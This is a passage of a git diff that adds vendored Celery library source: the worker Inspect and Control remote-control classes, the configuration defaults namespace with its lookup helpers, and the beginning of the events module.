logger.info('after fork raised exception: %r', exc, exc_info=1) + + +class Inspect: + """API for inspecting workers. + + This class provides proxy for accessing Inspect API of workers. The API is + defined in :py:mod:`celery.worker.control` + """ + + app = None + + def __init__(self, destination=None, timeout=1.0, callback=None, + connection=None, app=None, limit=None, pattern=None, + matcher=None): + self.app = app or self.app + self.destination = destination + self.timeout = timeout + self.callback = callback + self.connection = connection + self.limit = limit + self.pattern = pattern + self.matcher = matcher + + def _prepare(self, reply): + if reply: + by_node = flatten_reply(reply) + if (self.destination and + not isinstance(self.destination, (list, tuple))): + return by_node.get(self.destination) + if self.pattern: + pattern = self.pattern + matcher = self.matcher + return {node: reply for node, reply in by_node.items() + if match(node, pattern, matcher)} + return by_node + + def _request(self, command, **kwargs): + return self._prepare(self.app.control.broadcast( + command, + arguments=kwargs, + destination=self.destination, + callback=self.callback, + connection=self.connection, + limit=self.limit, + timeout=self.timeout, reply=True, + pattern=self.pattern, matcher=self.matcher, + )) + + def report(self): + """Return human readable report for each worker. + + Returns: + Dict: Dictionary ``{HOSTNAME: {'ok': REPORT_STRING}}``. + """ + return self._request('report') + + def clock(self): + """Get the Clock value on workers. + + >>> app.control.inspect().clock() + {'celery@node1': {'clock': 12}} + + Returns: + Dict: Dictionary ``{HOSTNAME: CLOCK_VALUE}``. + """ + return self._request('clock') + + def active(self, safe=None): + """Return list of tasks currently executed by workers. + + Arguments: + safe (Boolean): Set to True to disable deserialization. + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``. + + See Also: + For ``TASK_INFO`` details see :func:`query_task` return value. + + """ + return self._request('active', safe=safe) + + def scheduled(self, safe=None): + """Return list of scheduled tasks with details. + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK_SCHEDULED_INFO,...]}``. + + Here is the list of ``TASK_SCHEDULED_INFO`` fields: + + * ``eta`` - scheduled time for task execution as string in ISO 8601 format + * ``priority`` - priority of the task + * ``request`` - field containing ``TASK_INFO`` value. + + See Also: + For more details about ``TASK_INFO`` see :func:`query_task` return value. + """ + return self._request('scheduled') + + def reserved(self, safe=None): + """Return list of currently reserved tasks, not including scheduled/active. + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``. + + See Also: + For ``TASK_INFO`` details see :func:`query_task` return value. + """ + return self._request('reserved') + + def stats(self): + """Return statistics of worker. + + Returns: + Dict: Dictionary ``{HOSTNAME: STAT_INFO}``. + + Here is the list of ``STAT_INFO`` fields: + + * ``broker`` - Section for broker information. + * ``connect_timeout`` - Timeout in seconds (int/float) for establishing a new connection. + * ``heartbeat`` - Current heartbeat value (set by client). + * ``hostname`` - Node name of the remote broker. + * ``insist`` - No longer used. + * ``login_method`` - Login method used to connect to the broker. + * ``port`` - Port of the remote broker. + * ``ssl`` - SSL enabled/disabled. + * ``transport`` - Name of transport used (e.g., amqp or redis) + * ``transport_options`` - Options passed to transport. + * ``uri_prefix`` - Some transports expects the host name to be a URL. + E.g. ``redis+socket:///tmp/redis.sock``. + In this example the URI-prefix will be redis. + * ``userid`` - User id used to connect to the broker with. + * ``virtual_host`` - Virtual host used. + * ``clock`` - Value of the workers logical clock. This is a positive integer + and should be increasing every time you receive statistics. + * ``uptime`` - Numbers of seconds since the worker controller was started + * ``pid`` - Process id of the worker instance (Main process). + * ``pool`` - Pool-specific section. + * ``max-concurrency`` - Max number of processes/threads/green threads. + * ``max-tasks-per-child`` - Max number of tasks a thread may execute before being recycled. + * ``processes`` - List of PIDs (or thread-id’s). + * ``put-guarded-by-semaphore`` - Internal + * ``timeouts`` - Default values for time limits. + * ``writes`` - Specific to the prefork pool, this shows the distribution + of writes to each process in the pool when using async I/O. + * ``prefetch_count`` - Current prefetch count value for the task consumer. + * ``rusage`` - System usage statistics. The fields available may be different on your platform. + From :manpage:`getrusage(2)`: + + * ``stime`` - Time spent in operating system code on behalf of this process. + * ``utime`` - Time spent executing user instructions. + * ``maxrss`` - The maximum resident size used by this process (in kilobytes). + * ``idrss`` - Amount of non-shared memory used for data (in kilobytes times + ticks of execution) + * ``isrss`` - Amount of non-shared memory used for stack space + (in kilobytes times ticks of execution) + * ``ixrss`` - Amount of memory shared with other processes + (in kilobytes times ticks of execution). + * ``inblock`` - Number of times the file system had to read from the disk + on behalf of this process. + * ``oublock`` - Number of times the file system has to write to disk + on behalf of this process. + * ``majflt`` - Number of page faults that were serviced by doing I/O. + * ``minflt`` - Number of page faults that were serviced without doing I/O. + * ``msgrcv`` - Number of IPC messages received. + * ``msgsnd`` - Number of IPC messages sent. + * ``nvcsw`` - Number of times this process voluntarily invoked a context switch. + * ``nivcsw`` - Number of times an involuntary context switch took place. + * ``nsignals`` - Number of signals received. + * ``nswap`` - The number of times this process was swapped entirely + out of memory. + * ``total`` - Map of task names and the total number of tasks with that type + the worker has accepted since start-up. + """ + return self._request('stats') + + def revoked(self): + """Return list of revoked tasks. + + >>> app.control.inspect().revoked() + {'celery@node1': ['16f527de-1c72-47a6-b477-c472b92fef7a']} + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK_ID, ...]}``. + """ + return self._request('revoked') + + def registered(self, *taskinfoitems): + """Return all registered tasks per worker. + + >>> app.control.inspect().registered() + {'celery@node1': ['task1', 'task1']} + >>> app.control.inspect().registered('serializer', 'max_retries') + {'celery@node1': ['task_foo [serializer=json max_retries=3]', 'tasb_bar [serializer=json max_retries=3]']} + + Arguments: + taskinfoitems (Sequence[str]): List of :class:`~celery.app.task.Task` + attributes to include. + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK1_INFO, ...]}``. + """ + return self._request('registered', taskinfoitems=taskinfoitems) + registered_tasks = registered + + def ping(self, destination=None): + """Ping all (or specific) workers. + + >>> app.control.inspect().ping() + {'celery@node1': {'ok': 'pong'}, 'celery@node2': {'ok': 'pong'}} + >>> app.control.inspect().ping(destination=['celery@node1']) + {'celery@node1': {'ok': 'pong'}} + + Arguments: + destination (List): If set, a list of the hosts to send the + command to, when empty broadcast to all workers. + + Returns: + Dict: Dictionary ``{HOSTNAME: {'ok': 'pong'}}``. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + if destination: + self.destination = destination + return self._request('ping') + + def active_queues(self): + """Return information about queues from which worker consumes tasks. + + Returns: + Dict: Dictionary ``{HOSTNAME: [QUEUE_INFO, QUEUE_INFO,...]}``. + + Here is the list of ``QUEUE_INFO`` fields: + + * ``name`` + * ``exchange`` + * ``name`` + * ``type`` + * ``arguments`` + * ``durable`` + * ``passive`` + * ``auto_delete`` + * ``delivery_mode`` + * ``no_declare`` + * ``routing_key`` + * ``queue_arguments`` + * ``binding_arguments`` + * ``consumer_arguments`` + * ``durable`` + * ``exclusive`` + * ``auto_delete`` + * ``no_ack`` + * ``alias`` + * ``bindings`` + * ``no_declare`` + * ``expires`` + * ``message_ttl`` + * ``max_length`` + * ``max_length_bytes`` + * ``max_priority`` + + See Also: + See the RabbitMQ/AMQP documentation for more details about + ``queue_info`` fields. + Note: + The ``queue_info`` fields are RabbitMQ/AMQP oriented. + Not all fields applies for other transports. + """ + return self._request('active_queues') + + def query_task(self, *ids): + """Return detail of tasks currently executed by workers. + + Arguments: + *ids (str): IDs of tasks to be queried. + + Returns: + Dict: Dictionary ``{HOSTNAME: {TASK_ID: [STATE, TASK_INFO]}}``. + + Here is the list of ``TASK_INFO`` fields: + * ``id`` - ID of the task + * ``name`` - Name of the task + * ``args`` - Positinal arguments passed to the task + * ``kwargs`` - Keyword arguments passed to the task + * ``type`` - Type of the task + * ``hostname`` - Hostname of the worker processing the task + * ``time_start`` - Time of processing start + * ``acknowledged`` - True when task was acknowledged to broker + * ``delivery_info`` - Dictionary containing delivery information + * ``exchange`` - Name of exchange where task was published + * ``routing_key`` - Routing key used when task was published + * ``priority`` - Priority used when task was published + * ``redelivered`` - True if the task was redelivered + * ``worker_pid`` - PID of worker processin the task + + """ + # signature used be unary: query_task(ids=[id1, id2]) + # we need this to preserve backward compatibility. + if len(ids) == 1 and isinstance(ids[0], (list, tuple)): + ids = ids[0] + return self._request('query_task', ids=ids) + + def conf(self, with_defaults=False): + """Return configuration of each worker. + + Arguments: + with_defaults (bool): if set to True, method returns also + configuration options with default values. + + Returns: + Dict: Dictionary ``{HOSTNAME: WORKER_CONFIGURATION}``. + + See Also: + ``WORKER_CONFIGURATION`` is a dictionary containing current configuration options. + See :ref:`configuration` for possible values. + """ + return self._request('conf', with_defaults=with_defaults) + + def hello(self, from_node, revoked=None): + return self._request('hello', from_node=from_node, revoked=revoked) + + def memsample(self): + """Return sample current RSS memory usage. + + Note: + Requires the psutils library. + """ + return self._request('memsample') + + def memdump(self, samples=10): + """Dump statistics of previous memsample requests. + + Note: + Requires the psutils library. + """ + return self._request('memdump', samples=samples) + + def objgraph(self, type='Request', n=200, max_depth=10): + """Create graph of uncollected objects (memory-leak debugging). + + Arguments: + n (int): Max number of objects to graph. + max_depth (int): Traverse at most n levels deep. + type (str): Name of object to graph. Default is ``"Request"``. + + Returns: + Dict: Dictionary ``{'filename': FILENAME}`` + + Note: + Requires the objgraph library. + """ + return self._request('objgraph', num=n, max_depth=max_depth, type=type) + + +class Control: + """Worker remote control client.""" + + Mailbox = Mailbox + + def __init__(self, app=None): + self.app = app + self.mailbox = self.Mailbox( + app.conf.control_exchange, + type='fanout', + accept=app.conf.accept_content, + serializer=app.conf.task_serializer, + producer_pool=lazy(lambda: self.app.amqp.producer_pool), + queue_ttl=app.conf.control_queue_ttl, + reply_queue_ttl=app.conf.control_queue_ttl, + queue_expires=app.conf.control_queue_expires, + reply_queue_expires=app.conf.control_queue_expires, + ) + register_after_fork(self, _after_fork_cleanup_control) + + def _after_fork(self): + del self.mailbox.producer_pool + + @cached_property + def inspect(self): + """Create new :class:`Inspect` instance.""" + return self.app.subclass_with_self(Inspect, reverse='control.inspect') + + def purge(self, connection=None): + """Discard all waiting tasks. + + This will ignore all tasks waiting for execution, and they will + be deleted from the messaging server. + + Arguments: + connection (kombu.Connection): Optional specific connection + instance to use. If not provided a connection will + be acquired from the connection pool. + + Returns: + int: the number of tasks discarded. + """ + with self.app.connection_or_acquire(connection) as conn: + return self.app.amqp.TaskConsumer(conn).purge() + discard_all = purge + + def election(self, id, topic, action=None, connection=None): + self.broadcast( + 'election', connection=connection, destination=None, + arguments={ + 'id': id, 'topic': topic, 'action': action, + }, + ) + + def revoke(self, task_id, destination=None, terminate=False, + signal=TERM_SIGNAME, **kwargs): + """Tell all (or specific) workers to revoke a task by id (or list of ids). + + If a task is revoked, the workers will ignore the task and + not execute it after all. + + Arguments: + task_id (Union(str, list)): Id of the task to revoke + (or list of ids). + terminate (bool): Also terminate the process currently working + on the task (if any). + signal (str): Name of signal to send to process if terminate. + Default is TERM. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + return self.broadcast('revoke', destination=destination, arguments={ + 'task_id': task_id, + 'terminate': terminate, + 'signal': signal, + }, **kwargs) + + def revoke_by_stamped_headers(self, headers, destination=None, terminate=False, + signal=TERM_SIGNAME, **kwargs): + """ + Tell all (or specific) workers to revoke a task by headers. + + If a task is revoked, the workers will ignore the task and + not execute it after all. + + Arguments: + headers (dict[str, Union(str, list)]): Headers to match when revoking tasks. + terminate (bool): Also terminate the process currently working + on the task (if any). + signal (str): Name of signal to send to process if terminate. + Default is TERM. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + result = self.broadcast('revoke_by_stamped_headers', destination=destination, arguments={ + 'headers': headers, + 'terminate': terminate, + 'signal': signal, + }, **kwargs) + + task_ids = set() + if result: + for host in result: + for response in host.values(): + task_ids.update(response['ok']) + + if task_ids: + return self.revoke(list(task_ids), destination=destination, terminate=terminate, signal=signal, **kwargs) + else: + return result + + def terminate(self, task_id, + destination=None, signal=TERM_SIGNAME, **kwargs): + """Tell all (or specific) workers to terminate a task by id (or list of ids). + + See Also: + This is just a shortcut to :meth:`revoke` with the terminate + argument enabled. + """ + return self.revoke( + task_id, + destination=destination, terminate=True, signal=signal, **kwargs) + + def ping(self, destination=None, timeout=1.0, **kwargs): + """Ping all (or specific) workers. + + >>> app.control.ping() + [{'celery@node1': {'ok': 'pong'}}, {'celery@node2': {'ok': 'pong'}}] + >>> app.control.ping(destination=['celery@node2']) + [{'celery@node2': {'ok': 'pong'}}] + + Returns: + List[Dict]: List of ``{HOSTNAME: {'ok': 'pong'}}`` dictionaries. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + return self.broadcast( + 'ping', reply=True, arguments={}, destination=destination, + timeout=timeout, **kwargs) + + def rate_limit(self, task_name, rate_limit, destination=None, **kwargs): + """Tell workers to set a new rate limit for task by type. + + Arguments: + task_name (str): Name of task to change rate limit for. + rate_limit (int, str): The rate limit as tasks per second, + or a rate limit string (`'100/m'`, etc. + see :attr:`celery.app.task.Task.rate_limit` for + more information). + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + return self.broadcast( + 'rate_limit', + destination=destination, + arguments={ + 'task_name': task_name, + 'rate_limit': rate_limit, + }, + **kwargs) + + def add_consumer(self, queue, + exchange=None, exchange_type='direct', routing_key=None, + options=None, destination=None, **kwargs): + """Tell all (or specific) workers to start consuming from a new queue. + + Only the queue name is required as if only the queue is specified + then the exchange/routing key will be set to the same name ( + like automatic queues do). + + Note: + This command does not respect the default queue/exchange + options in the configuration. + + Arguments: + queue (str): Name of queue to start consuming from. + exchange (str): Optional name of exchange. + exchange_type (str): Type of exchange (defaults to 'direct') + command to, when empty broadcast to all workers. + routing_key (str): Optional routing key. + options (Dict): Additional options as supported + by :meth:`kombu.entity.Queue.from_dict`. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + return self.broadcast( + 'add_consumer', + destination=destination, + arguments=dict({ + 'queue': queue, + 'exchange': exchange, + 'exchange_type': exchange_type, + 'routing_key': routing_key, + }, **options or {}), + **kwargs + ) + + def cancel_consumer(self, queue, destination=None, **kwargs): + """Tell all (or specific) workers to stop consuming from ``queue``. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'cancel_consumer', destination=destination, + arguments={'queue': queue}, **kwargs) + + def time_limit(self, task_name, soft=None, hard=None, + destination=None, **kwargs): + """Tell workers to set time limits for a task by type. + + Arguments: + task_name (str): Name of task to change time limits for. + soft (float): New soft time limit (in seconds). + hard (float): New hard time limit (in seconds). + **kwargs (Any): arguments passed on to :meth:`broadcast`. + """ + return self.broadcast( + 'time_limit', + arguments={ + 'task_name': task_name, + 'hard': hard, + 'soft': soft, + }, + destination=destination, + **kwargs) + + def enable_events(self, destination=None, **kwargs): + """Tell all (or specific) workers to enable events. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'enable_events', arguments={}, destination=destination, **kwargs) + + def disable_events(self, destination=None, **kwargs): + """Tell all (or specific) workers to disable events. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'disable_events', arguments={}, destination=destination, **kwargs) + + def pool_grow(self, n=1, destination=None, **kwargs): + """Tell all (or specific) workers to grow the pool by ``n``. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'pool_grow', arguments={'n': n}, destination=destination, **kwargs) + + def pool_shrink(self, n=1, destination=None, **kwargs): + """Tell all (or specific) workers to shrink the pool by ``n``. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'pool_shrink', arguments={'n': n}, + destination=destination, **kwargs) + + def autoscale(self, max, min, destination=None, **kwargs): + """Change worker(s) autoscale setting. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'autoscale', arguments={'max': max, 'min': min}, + destination=destination, **kwargs) + + def shutdown(self, destination=None, **kwargs): + """Shutdown worker(s). + + See Also: + Supports the same arguments as :meth:`broadcast` + """ + return self.broadcast( + 'shutdown', arguments={}, destination=destination, **kwargs) + + def pool_restart(self, modules=None, reload=False, reloader=None, + destination=None, **kwargs): + """Restart the execution pools of all or specific workers. + + Keyword Arguments: + modules (Sequence[str]): List of modules to reload. + reload (bool): Flag to enable module reloading. Default is False. + reloader (Any): Function to reload a module. + destination (Sequence[str]): List of worker names to send this + command to. + + See Also: + Supports the same arguments as :meth:`broadcast` + """ + return self.broadcast( + 'pool_restart', + arguments={ + 'modules': modules, + 'reload': reload, + 'reloader': reloader, + }, + destination=destination, **kwargs) + + def heartbeat(self, destination=None, **kwargs): + """Tell worker(s) to send a heartbeat immediately. + + See Also: + Supports the same arguments as :meth:`broadcast` + """ + return self.broadcast( + 'heartbeat', arguments={}, destination=destination, **kwargs) + + def broadcast(self, command, arguments=None, destination=None, + connection=None, reply=False, timeout=1.0, limit=None, + callback=None, channel=None, pattern=None, matcher=None, + **extra_kwargs): + """Broadcast a control command to the celery workers. + + Arguments: + command (str): Name of command to send. + arguments (Dict): Keyword arguments for the command. + destination (List): If set, a list of the hosts to send the + command to, when empty broadcast to all workers. + connection (kombu.Connection): Custom broker connection to use, + if not set, a connection will be acquired from the pool. + reply (bool): Wait for and return the reply. + timeout (float): Timeout in seconds to wait for the reply. + limit (int): Limit number of replies. + callback (Callable): Callback called immediately for + each reply received. + pattern (str): Custom pattern string to match + matcher (Callable): Custom matcher to run the pattern to match + """ + with self.app.connection_or_acquire(connection) as conn: + arguments = dict(arguments or {}, **extra_kwargs) + if pattern and matcher: + # tests pass easier without requiring pattern/matcher to + # always be sent in + return self.mailbox(conn)._broadcast( + command, arguments, destination, reply, timeout, + limit, callback, channel=channel, + pattern=pattern, matcher=matcher, + ) + else: + return self.mailbox(conn)._broadcast( + command, arguments, destination, reply, timeout, + limit, callback, channel=channel, + ) diff --git a/env/Lib/site-packages/celery/app/defaults.py b/env/Lib/site-packages/celery/app/defaults.py new file mode 100644 index 00000000..a9f68689 --- /dev/null +++ b/env/Lib/site-packages/celery/app/defaults.py @@ -0,0 +1,414 @@ +"""Configuration introspection and defaults.""" +from collections import deque, namedtuple +from datetime import timedelta + +from celery.utils.functional import memoize +from celery.utils.serialization import strtobool + +__all__ = ('Option', 'NAMESPACES', 'flatten', 'find') + + +DEFAULT_POOL = 'prefork' + +DEFAULT_ACCEPT_CONTENT = ('json',) +DEFAULT_PROCESS_LOG_FMT = """ + [%(asctime)s: %(levelname)s/%(processName)s] %(message)s +""".strip() +DEFAULT_TASK_LOG_FMT = """[%(asctime)s: %(levelname)s/%(processName)s] \ +%(task_name)s[%(task_id)s]: %(message)s""" + +DEFAULT_SECURITY_DIGEST = 'sha256' + + +OLD_NS = {'celery_{0}'} +OLD_NS_BEAT = {'celerybeat_{0}'} +OLD_NS_WORKER = {'celeryd_{0}'} + +searchresult = namedtuple('searchresult', ('namespace', 'key', 'type')) + + +def Namespace(__old__=None, **options): + if __old__ is not None: + for key, opt in options.items(): + if not opt.old: + opt.old = {o.format(key) for o in __old__} + return options + + +def old_ns(ns): + return {f'{ns}_{{0}}'} + + +class Option: + """Describes a Celery configuration option.""" + + alt = None + deprecate_by = None + remove_by = None + old = set() + typemap = {'string': str, 'int': int, 'float': float, 'any': lambda v: v, + 'bool': strtobool, 'dict': dict, 'tuple': tuple} + + def __init__(self, default=None, *args, **kwargs): + self.default = default + self.type = kwargs.get('type') or 'string' + for attr, value in kwargs.items(): + setattr(self, attr, value) + + def to_python(self, value): + return self.typemap[self.type](value) + + def __repr__(self): + return '{} default->{!r}>'.format(self.type, + self.default) + + +NAMESPACES = Namespace( + accept_content=Option(DEFAULT_ACCEPT_CONTENT, type='list', old=OLD_NS), + result_accept_content=Option(None, type='list'), + enable_utc=Option(True, type='bool'), + imports=Option((), type='tuple', old=OLD_NS), + include=Option((), type='tuple', old=OLD_NS), + timezone=Option(type='string', old=OLD_NS), + beat=Namespace( + __old__=OLD_NS_BEAT, + + max_loop_interval=Option(0, type='float'), + schedule=Option({}, type='dict'), + scheduler=Option('celery.beat:PersistentScheduler'), + schedule_filename=Option('celerybeat-schedule'), + sync_every=Option(0, type='int'), + cron_starting_deadline=Option(None, type=int) + ), + broker=Namespace( + url=Option(None, type='string'), + read_url=Option(None, type='string'), + write_url=Option(None, type='string'), + transport=Option(type='string'), + transport_options=Option({}, type='dict'), + connection_timeout=Option(4, type='float'), + connection_retry=Option(True, type='bool'), + connection_retry_on_startup=Option(None, type='bool'), + connection_max_retries=Option(100, type='int'), + channel_error_retry=Option(False, type='bool'), + failover_strategy=Option(None, type='string'), + heartbeat=Option(120, type='int'), + heartbeat_checkrate=Option(3.0, type='int'), + login_method=Option(None, type='string'), + pool_limit=Option(10, type='int'), + use_ssl=Option(False, type='bool'), + + host=Option(type='string'), + port=Option(type='int'), + user=Option(type='string'), + password=Option(type='string'), + vhost=Option(type='string'), + ), + cache=Namespace( + __old__=old_ns('celery_cache'), + + backend=Option(), + backend_options=Option({}, type='dict'), + ), + cassandra=Namespace( + entry_ttl=Option(type='float'), + keyspace=Option(type='string'), + port=Option(type='string'), + read_consistency=Option(type='string'), + servers=Option(type='list'), + bundle_path=Option(type='string'), + table=Option(type='string'), + write_consistency=Option(type='string'), + auth_provider=Option(type='string'), + auth_kwargs=Option(type='string'), + options=Option({}, type='dict'), + ), + s3=Namespace( + access_key_id=Option(type='string'), + secret_access_key=Option(type='string'), + bucket=Option(type='string'), + base_path=Option(type='string'), + endpoint_url=Option(type='string'), + region=Option(type='string'), + ), + azureblockblob=Namespace( + container_name=Option('celery', type='string'), + retry_initial_backoff_sec=Option(2, type='int'), + retry_increment_base=Option(2, type='int'), + retry_max_attempts=Option(3, type='int'), + base_path=Option('', type='string'), + connection_timeout=Option(20, type='int'), + read_timeout=Option(120, type='int'), + ), + control=Namespace( + queue_ttl=Option(300.0, type='float'), + queue_expires=Option(10.0, type='float'), + exchange=Option('celery', type='string'), + ), + couchbase=Namespace( + __old__=old_ns('celery_couchbase'), + + backend_settings=Option(None, type='dict'), + ), + arangodb=Namespace( + __old__=old_ns('celery_arangodb'), + backend_settings=Option(None, type='dict') + ), + mongodb=Namespace( + __old__=old_ns('celery_mongodb'), + + backend_settings=Option(type='dict'), + ), + cosmosdbsql=Namespace( + database_name=Option('celerydb', type='string'), + collection_name=Option('celerycol', type='string'), + consistency_level=Option('Session', type='string'), + max_retry_attempts=Option(9, type='int'), + max_retry_wait_time=Option(30, type='int'), + ), + event=Namespace( + __old__=old_ns('celery_event'), + + queue_expires=Option(60.0, type='float'), + queue_ttl=Option(5.0, type='float'), + queue_prefix=Option('celeryev'), + serializer=Option('json'), + exchange=Option('celeryev', type='string'), + ), + redis=Namespace( + __old__=old_ns('celery_redis'), + + backend_use_ssl=Option(type='dict'), + db=Option(type='int'), + host=Option(type='string'), + max_connections=Option(type='int'), + username=Option(type='string'), + password=Option(type='string'), + port=Option(type='int'), + socket_timeout=Option(120.0, type='float'), + socket_connect_timeout=Option(None, type='float'), + retry_on_timeout=Option(False, type='bool'), + socket_keepalive=Option(False, type='bool'), + ), + result=Namespace( + __old__=old_ns('celery_result'), + + backend=Option(type='string'), + cache_max=Option( + -1, + type='int', old={'celery_max_cached_results'}, + ), + compression=Option(type='str'), + exchange=Option('celeryresults'), + exchange_type=Option('direct'), + expires=Option( + timedelta(days=1), + type='float', old={'celery_task_result_expires'}, + ), + persistent=Option(None, type='bool'), + extended=Option(False, type='bool'), + serializer=Option('json'), + backend_transport_options=Option({}, type='dict'), + chord_retry_interval=Option(1.0, type='float'), + chord_join_timeout=Option(3.0, type='float'), + backend_max_sleep_between_retries_ms=Option(10000, type='int'), + backend_max_retries=Option(float("inf"), type='float'), + backend_base_sleep_between_retries_ms=Option(10, type='int'), + backend_always_retry=Option(False, type='bool'), + ), + elasticsearch=Namespace( + __old__=old_ns('celery_elasticsearch'), + + retry_on_timeout=Option(type='bool'), + max_retries=Option(type='int'), + timeout=Option(type='float'), + save_meta_as_text=Option(True, type='bool'), + ), + security=Namespace( + __old__=old_ns('celery_security'), + + certificate=Option(type='string'), + cert_store=Option(type='string'), + key=Option(type='string'), + key_password=Option(type='bytes'), + digest=Option(DEFAULT_SECURITY_DIGEST, type='string'), + ), + database=Namespace( + url=Option(old={'celery_result_dburi'}), + engine_options=Option( + type='dict', old={'celery_result_engine_options'}, + ), + short_lived_sessions=Option( + False, type='bool', old={'celery_result_db_short_lived_sessions'}, + ), + table_schemas=Option(type='dict'), + table_names=Option(type='dict', old={'celery_result_db_tablenames'}), + ), + task=Namespace( + __old__=OLD_NS, + acks_late=Option(False, type='bool'), + acks_on_failure_or_timeout=Option(True, type='bool'), + always_eager=Option(False, type='bool'), + annotations=Option(type='any'), + compression=Option(type='string', old={'celery_message_compression'}), + create_missing_queues=Option(True, type='bool'), + inherit_parent_priority=Option(False, type='bool'), + default_delivery_mode=Option(2, type='string'), + default_queue=Option('celery'), + default_exchange=Option(None, type='string'), # taken from queue + default_exchange_type=Option('direct'), + default_routing_key=Option(None, type='string'), # taken from queue + default_rate_limit=Option(type='string'), + default_priority=Option(None, type='string'), + eager_propagates=Option( + False, type='bool', old={'celery_eager_propagates_exceptions'}, + ), + ignore_result=Option(False, type='bool'), + store_eager_result=Option(False, type='bool'), + protocol=Option(2, type='int', old={'celery_task_protocol'}), + publish_retry=Option( + True, type='bool', old={'celery_task_publish_retry'}, + ), + publish_retry_policy=Option( + {'max_retries': 3, + 'interval_start': 0, + 'interval_max': 1, + 'interval_step': 0.2}, + type='dict', old={'celery_task_publish_retry_policy'}, + ), + queues=Option(type='dict'), + queue_max_priority=Option(None, type='int'), + reject_on_worker_lost=Option(type='bool'), + remote_tracebacks=Option(False, type='bool'), + routes=Option(type='any'), + send_sent_event=Option( + False, type='bool', old={'celery_send_task_sent_event'}, + ), + serializer=Option('json', old={'celery_task_serializer'}), + soft_time_limit=Option( + type='float', old={'celeryd_task_soft_time_limit'}, + ), + time_limit=Option( + type='float', old={'celeryd_task_time_limit'}, + ), + store_errors_even_if_ignored=Option(False, type='bool'), + track_started=Option(False, type='bool'), + allow_error_cb_on_chord_header=Option(False, type='bool'), + ), + worker=Namespace( + __old__=OLD_NS_WORKER, + agent=Option(None, type='string'), + autoscaler=Option('celery.worker.autoscale:Autoscaler'), + cancel_long_running_tasks_on_connection_loss=Option( + False, type='bool' + ), + concurrency=Option(None, type='int'), + consumer=Option('celery.worker.consumer:Consumer', type='string'), + direct=Option(False, type='bool', old={'celery_worker_direct'}), + disable_rate_limits=Option( + False, type='bool', old={'celery_disable_rate_limits'}, + ), + deduplicate_successful_tasks=Option( + False, type='bool' + ), + enable_remote_control=Option( + True, type='bool', old={'celery_enable_remote_control'}, + ), + hijack_root_logger=Option(True, type='bool'), + log_color=Option(type='bool'), + log_format=Option(DEFAULT_PROCESS_LOG_FMT), + lost_wait=Option(10.0, type='float', old={'celeryd_worker_lost_wait'}), + max_memory_per_child=Option(type='int'), + max_tasks_per_child=Option(type='int'), + pool=Option(DEFAULT_POOL), + pool_putlocks=Option(True, type='bool'), + pool_restarts=Option(False, type='bool'), + proc_alive_timeout=Option(4.0, type='float'), + prefetch_multiplier=Option(4, type='int'), + redirect_stdouts=Option( + True, type='bool', old={'celery_redirect_stdouts'}, + ), + redirect_stdouts_level=Option( + 'WARNING', old={'celery_redirect_stdouts_level'}, + ), + send_task_events=Option( + False, type='bool', old={'celery_send_events'}, + ), + state_db=Option(), + task_log_format=Option(DEFAULT_TASK_LOG_FMT), + timer=Option(type='string'), + timer_precision=Option(1.0, type='float'), + ), +) + + +def _flatten_keys(ns, key, opt): + return [(ns + key, opt)] + + +def _to_compat(ns, key, opt): + if opt.old: + return [ + (oldkey.format(key).upper(), ns + key, opt) + for oldkey in opt.old + ] + return [((ns + key).upper(), ns + key, opt)] + + +def flatten(d, root='', keyfilter=_flatten_keys): + """Flatten settings.""" + stack = deque([(root, d)]) + while stack: + ns, options = stack.popleft() + for key, opt in options.items(): + if isinstance(opt, dict): + stack.append((ns + key + '_', opt)) + else: + yield from keyfilter(ns, key, opt) + + +DEFAULTS = { + key: opt.default for key, opt in flatten(NAMESPACES) +} +__compat = list(flatten(NAMESPACES, keyfilter=_to_compat)) +_OLD_DEFAULTS = {old_key: opt.default for old_key, _, opt in __compat} +_TO_OLD_KEY = {new_key: old_key for old_key, new_key, _ in __compat} +_TO_NEW_KEY = {old_key: new_key for old_key, new_key, _ in __compat} +__compat = None + +SETTING_KEYS = set(DEFAULTS.keys()) +_OLD_SETTING_KEYS = set(_TO_NEW_KEY.keys()) + + +def find_deprecated_settings(source): # pragma: no cover + from celery.utils import deprecated + for name, opt in flatten(NAMESPACES): + if (opt.deprecate_by or opt.remove_by) and getattr(source, name, None): + deprecated.warn(description=f'The {name!r} setting', + deprecation=opt.deprecate_by, + removal=opt.remove_by, + alternative=f'Use the {opt.alt} instead') + return source + + +@memoize(maxsize=None) +def find(name, namespace='celery'): + """Find setting by name.""" + # - Try specified name-space first. + namespace = namespace.lower() + try: + return searchresult( + namespace, name.lower(), NAMESPACES[namespace][name.lower()], + ) + except KeyError: + # - Try all the other namespaces. + for ns, opts in NAMESPACES.items(): + if ns.lower() == name.lower(): + return searchresult(None, ns, opts) + elif isinstance(opts, dict): + try: + return searchresult(ns, name.lower(), opts[name.lower()]) + except KeyError: + pass + # - See if name is a qualname last. + return searchresult(None, name.lower(), DEFAULTS[name.lower()]) diff --git a/env/Lib/site-packages/celery/app/events.py b/env/Lib/site-packages/celery/app/events.py new file mode 100644 index 00000000..f2ebea06 --- /dev/null +++ b/env/Lib/site-packages/celery/app/events.py @@ -0,0 +1,40 @@ +"""Implementation for the app.events shortcuts.""" +from contextlib import contextmanager + +from kombu.utils.objects import cached_property + + +class Events: + """Implements app.events.""" + + receiver_cls = 'celery.events.receiver:EventReceiver' + dispatcher_cls = 'celery.events.dispatcher:EventDispatcher' + state_cls = 'celery.events.state:State' + + def __init__(self, app=None): + self.app = 